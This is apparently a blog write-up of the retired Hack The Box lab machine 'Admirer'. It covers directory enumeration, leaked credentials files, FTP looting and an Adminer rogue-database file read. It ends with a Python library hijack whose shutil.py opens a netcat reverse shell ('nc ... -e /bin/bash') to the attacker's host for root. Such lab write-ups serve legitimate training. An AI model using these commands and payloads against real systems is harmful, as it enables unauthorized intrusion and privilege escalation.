Security Blog, Rants, Raves, Write-ups, and Code
Admirer
| Name: | Admirer 
|
|---|---|
| Release Date: | 02 May 2020 |
| Retire Date: | 26 Sep 2020 |
| OS: | Linux |
| Base Points: | Easy - Retired [0] |
| Rated Difficulty: |  |
| Radar Graph: |  |
 |
whois  00 days, 03 hours, 57 mins, 47 seconds |
 |
joohoi  00 days, 04 hours, 33 mins, 13 seconds |
| Creator: | polarbearer  GibParadox  |
| Pentest Workstation PDF: | Admirer.pdf |
Again, we start with ../AutoRecon/src/autorecon/autorecon.py 10.10.10.187
We've got HTTP, so our next move is checking for other folders. AutoRecon has already found an /admin-dir so let's start there with:
gobuster dir -w /usr/share/dirb/wordlists/big.txt -u http://10.10.10.187/admin-dir -x php,html,txt
┌──(kali㉿kali)-[~/Admirer]
└─$ gobuster dir -w /usr/share/dirb/wordlists/big.txt -u http://10.10.10.187/admin-dir -x php,html,txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.10.187/admin-dir
[+] Threads: 10
[+] Wordlist: /usr/share/dirb/wordlists/big.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: php,html,txt
[+] Timeout: 10s
===============================================================
2021/03/07 23:31:20 Starting gobuster
===============================================================
/.htaccess (Status: 403)
/.htaccess.php (Status: 403)
/.htaccess.html (Status: 403)
/.htaccess.txt (Status: 403)
/.htpasswd (Status: 403)
/.htpasswd.php (Status: 403)
/.htpasswd.html (Status: 403)
/.htpasswd.txt (Status: 403)
/contacts.txt (Status: 200)
/credentials.txt (Status: 200)
===============================================================
2021/03/07 23:42:54 Finished
===============================================================
A contacts.txt and credentials.txt file inside of the admin-dir folder both look promising. We can grab those with simple WGET statements.
wget http://10.10.10.187/admin-dir/contacts.txt
wget http://10.10.10.187/admin-dir/credentials.txt
Then, we can cat those out and get some juicy credentials (FTP, An Internal Mail System, and Wordpress).
┌──(kali㉿kali)-[~/Admirer/results/10.10.10.187/loot]
└─$ cat contacts.txt
##########
# admins #
##########
# Penny
Email: p.wise@admirer.htb
##############
# developers #
##############
# Rajesh
Email: r.nayyar@admirer.htb
# Amy
Email: a.bialik@admirer.htb
# Leonard
Email: l.galecki@admirer.htb
#############
# designers #
#############
# Howard
Email: h.helberg@admirer.htb
# Bernadette
Email: b.rauch@admirer.htb
┌──(kali㉿kali)-[~/Admirer/results/10.10.10.187/loot]
└─$ cat credentials.txt
[Internal mail account]
w.cooper@admirer.htb
fgJr6q#S\W:$P
[FTP account]
ftpuser
%n?4Wz}R$tTF7
[Wordpress account]
admin
w0rdpr3ss01!
Now that we have some creds, let's jump to the FTP side of the world.
┌──(kali㉿kali)-[~/Admirer/results/10.10.10.187/loot]
└─$ ftp 10.10.10.187
Connected to 10.10.10.187.
220 (vsFTPd 3.0.3)
Name (10.10.10.187:kali): ftpuser
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 3405 Dec 02 2019 dump.sql
-rw-r--r-- 1 0 0 5270987 Dec 03 2019 html.tar.gz
226 Directory send OK.
ftp> get dump.sql
local: dump.sql remote: dump.sql
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for dump.sql (3405 bytes).
226 Transfer complete.
3405 bytes received in 0.00 secs (1.7980 MB/s)
ftp> get html.tar.gz
local: html.tar.gz remote: html.tar.gz
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for html.tar.gz (5270987 bytes).
226 Transfer complete.
5270987 bytes received in 7.35 secs (700.0977 kB/s)
ftp>
If you notice, there were dump.sql and html.tar.gz files and I went ahead and used FTP GET statements to GET the files. Go ahead and extract the html.tar.gz. Since we're looking for passwords, let's use "grep -ir password" and we get some credentials inside the index.php file.
So, if we cat index.php and ./utility-scripts/db-admin.php, we can see who those credentials belong to.
The credentials belong to "waldo". Also, if we look at admin_tasks, we see a PCI-DSS violation of a webserver revealing internal directory structure or a possible vulnerability built into the admin_tasks.php page where it calls /opt/scripts/admin_tasks.sh.
Since we didn't notice the utility scripts folder in our gobuster scan, let's run gobuster against it and see what we can find using "gobuster dir -w /usr/share/dirb/wordlists/big.txt -u http://10.10.10.187/utility-scripts -x php,html,txt" wheere we find the adminer.php page.
┌──(kali㉿kali)-[~/…/10.10.10.187/loot/html/utility-scripts]
└─$ gobuster dir -w /usr/share/dirb/wordlists/big.txt -u http://10.10.10.187/utility-scripts -x php,html,txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.10.187/utility-scripts
[+] Threads: 10
[+] Wordlist: /usr/share/dirb/wordlists/big.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: php,html,txt
[+] Timeout: 10s
===============================================================
2021/03/08 08:02:09 Starting gobuster
===============================================================
/.htaccess (Status: 403)
/.htaccess.php (Status: 403)
/.htaccess.html (Status: 403)
/.htaccess.txt (Status: 403)
/.htpasswd (Status: 403)
/.htpasswd.php (Status: 403)
/.htpasswd.html (Status: 403)
/.htpasswd.txt (Status: 403)
/adminer.php (Status: 200)
/info.php (Status: 200)
/phptest.php (Status: 200)
===============================================================
2021/03/08 08:09:58 Finished
===============================================================
Adminer is a MySQL management tool and we know there's a MySQL instance running on 3306. Trying to log in with either of the two waldo credentials we've already found, fails miserably. A little bit of research later and I find this https://infosecwriteups.com/adminer-script-results-to-pwning-server-private-bug-bounty-program-fe6d8a43fe6f. It looks like we're doig this the long way.
First, let's install MariaDB (if we haven't already), and set up a new local database on our Attacking machine. We do thise with:
sudo apt-get install ariadb-server-10.5 mariadb-client-10.5 -y
Now, we have to start the service and configure a database. We do that with:
sudo systemctl start mariadb
sudo mysql -u root
MariaDB [(none)]> CREATE DATABASE backup;
USE backup;
CREATE TABLE backup (name VARCHAR(2000));
CREATE USER 'backup'@'10.10.10.187' IDENTIFIED BY'toor';
GRANT ALL PRIVILEGES ON backup.* TO 'backup'@'10.10.10.187';
Next, we make sure that traffic is allowed between Admirer and our Attacking machine and that the connection is bound to our tun0 adapter. We do that with:
vi /etc/mysql/mariadb.conf.d/50-server.cnf
Inside the 50-server.cnf file, change the bind address to your tun0 address (in my case 10.10.14.4) or allow all addresses by setting it to 0.0.0.0. We should be able to log in as our backup user and query a local file.
It looks like Waldo updated his password to "&<h5b~yK3F#{PaPB&dA}{H>". So, let's try ssh with those and we are successful!
Now, we can run LinEnum.sh on the Target. One thing we find in that script is that the script creating that lovely html.tar.gz backup file we;ve been digging around in for the past few hours is owned by root. Possibly, we can use that to grant a Netcat callback as root. Looking back at the admin_tasks.sh script, we see it calling backup.py and that backup.py calls shutil.py. We can craft our own shutil.py, change the python path, and call the positional variable of the admin_tasks script. First, the Netcat callback.
shutil.py:
import os
def make_archive(h, t, b):
os.system('nc 10.10.14.4 9999 -e "/bin/bash"')
Next we have to change the python path and call the 6th task of admin_tasks. I created this shutil.py in /dev/shm, so the python path needs to point there, and we need to call all of it with sudo. Start a Netcat listener on 9999 and run:
sudo PYTHONPATH=/dev/shm /opt/scripts/admin_tasks.sh 6
Voila! Root Shell.
©2020 Phoenix Computing Solutions | Powered by Coffee, Sarcasm, and Insanity
Everything included in the site is the intellectual property of Chris Ruggieri (Neocount Phoenix) and Phoenix Computing Solutions.
This information should not be construed as legal advice. The owner can not be held liable for anything another entity does with this information.
This information is solely the opinions and experiences of myself (Chris Ruggieri) and should not be construed as endorsement of any product, service, or of illegal activity
(GET WRITTEN PERMISSION PEOPLE!!)
Any links I provide as a convenience and for informational purposes only; they do not constitute an endorsement or an approval by the owner of this site for any of the products, services or opinions of the corporation or organization or individual.
Contact the external sites for answers to questions regarding its content.
This Includes any links posted by Chris Ruggieri in any other websites, Social Media networks, Online Groups and Online sharing Websites.